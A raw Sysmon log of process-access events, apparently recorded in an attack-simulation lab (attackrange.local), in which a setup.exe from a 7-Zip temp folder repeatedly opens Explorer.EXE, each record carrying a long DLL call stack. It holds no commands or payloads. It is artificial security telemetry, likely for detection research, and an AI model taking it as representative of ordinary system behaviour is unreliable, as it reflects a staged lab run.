13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.567{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.552{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dl